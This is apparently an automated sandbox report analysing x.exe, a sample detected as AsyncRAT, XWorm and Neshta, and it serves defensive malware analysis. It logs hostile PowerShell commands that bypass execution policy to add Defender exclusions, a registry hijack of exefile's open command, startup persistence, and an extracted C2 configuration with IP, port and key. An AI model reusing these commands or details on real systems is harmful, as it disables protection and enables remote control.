

Windows Analysis Report
x.exe

Overview

General Information

Sample name: x.exe
Analysis ID: 1465840
MD5: d27e7c560c09eb318c80cab58baea1b2
SHA1: 354342a3b26579d2eb2a0db253ca6505629b3a48
SHA256: 6df33c856858c03f62d5a67a7bc69499db91a1405e67b83907dcabfe9bd31d40

Detection

AsyncRAT, Neshta, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AsyncRAT
Yara detected Neshta
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Classes Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • x.exe (PID: 1292 cmdline: "C:\Users\user\Desktop\x.exe" MD5: D27E7C560C09EB318C80CAB58BAEA1B2)
    • x.exe (PID: 5336 cmdline: "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe" MD5: 9F4FFCEB9E7905107492815B7EBFDC13)
      • svchost.com (PID: 5076 cmdline: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe' MD5: E2758E90753E604AB1857653E10B35EE)
        • powershell.exe (PID: 4132 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • svchost.com (PID: 8176 cmdline: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe' MD5: E2758E90753E604AB1857653E10B35EE)
        • powershell.exe (PID: 2848 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • svchost.com (PID: 5296 cmdline: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe' MD5: E2758E90753E604AB1857653E10B35EE)
        • powershell.exe (PID: 4516 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • svchost.com (PID: 5100 cmdline: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe' MD5: E2758E90753E604AB1857653E10B35EE)
        • powershell.exe (PID: 2196 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it could also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name: Neshta
Description: Neshta is a 2005 Belarusian file infector virus written in Delphi. The name of the virus comes from the Belarusian word "nesta" meaning "something."
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.neshta

Name: XWorm
Description: Malware with a wide range of capabilities ranging from RAT to ransomware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
Extracted malware configuration (XWorm):
{"C2 url": ["45.141.26.232"], "Port": "6666", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Yara matches on the submitted sample (Source | Rule | Description | Author | Strings):
x.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
x.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
x.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x137d9:$s6: VirtualBox
  • 0x13737:$s8: Win32_ComputerSystem
  • 0x14187:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x14224:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x14339:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x13e35:$cnc4: POST / HTTP/1.1

Yara matches on dropped files (Source | Rule | Description | Author | Strings):
C:\ProgramData\Java Update Checker (64 bit).exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
C:\ProgramData\Java Update Checker (64 bit).exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\ProgramData\Java Update Checker (64 bit).exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\ProgramData\Java Update Checker (64 bit).exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x81d9:$s6: VirtualBox
  • 0x8137:$s8: Win32_ComputerSystem
  • 0x8b87:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8c24:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8d39:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8835:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\3582-490\x.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security

Yara matches on memory dumps (Source | Rule | Description | Author | Strings):
00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x9a19:$s6: VirtualBox
  • 0x9977:$s8: Win32_ComputerSystem
  • 0xa3c7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xa464:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xa579:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xa075:$cnc4: POST / HTTP/1.1
00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Yara matches on unpacked PEs (Source | Rule | Description | Author | Strings):
2.0.x.exe.dc0000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
2.0.x.exe.dc0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
2.0.x.exe.dc0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
2.0.x.exe.dc0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x81d9:$s6: VirtualBox
  • 0x8137:$s8: Win32_ComputerSystem
  • 0x8b87:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8c24:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8d39:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8835:$cnc4: POST / HTTP/1.1
2.2.x.exe.30cf840.1.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security

System Summary

Sigma matches:
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\svchost.com, NewProcessName: C:\Windows\svchost.com, OriginalFileName: C:\Windows\svchost.com, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, ParentProcessId: 5336, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ProcessId: 5076, ProcessName: svchost.com
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\svchost.com, NewProcessName: C:\Windows\svchost.com, OriginalFileName: C:\Windows\svchost.com, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, ParentProcessId: 5336, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ProcessId: 5076, ProcessName: svchost.com
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ParentImage: C:\Windows\svchost.com, ParentProcessId: 5076, ParentProcessName: svchost.com, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ProcessId: 4132, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ParentImage: C:\Windows\svchost.com, ParentProcessId: 5076, ParentProcessName: svchost.com, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ProcessId: 4132, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\svchost.com "%1" %*, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\x.exe, ProcessId: 1292, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, ProcessId: 5336, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Checker (64 bit).lnk
Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, ParentCommandLine: "C:\Users\user\Desktop\x.exe", ParentImage: C:\Users\user\Desktop\x.exe, ParentProcessId: 1292, ParentProcessName: x.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe" , ProcessId: 5336, ProcessName: x.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ParentImage: C:\Windows\svchost.com, ParentProcessId: 5076, ParentProcessName: svchost.com, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ProcessId: 4132, ProcessName: powershell.exe
No Snort rule has matched

AV Detection

Source: x.exe | Avira: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | Avira: detection malicious, Label: W32/Delf.I
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | Avira: detection malicious, Label: W32/Delf.I
Source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["45.141.26.232"], "Port": "6666", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | ReversingLabs: Detection: 97%
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | ReversingLabs: Detection: 93%
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | Virustotal: Detection: 83%
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Virustotal: Detection: 88%
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Virustotal: Detection: 90%
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Virustotal: Detection: 90%
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | Virustotal: Detection: 93%
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe | Virustotal: Detection: 88%
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Virustotal: Detection: 88%
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | ReversingLabs: Detection: 100%
Source: x.exe | ReversingLabs: Detection: 97%
Source: x.exe | Virustotal: Detection: 93%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Joe Sandbox ML: detected
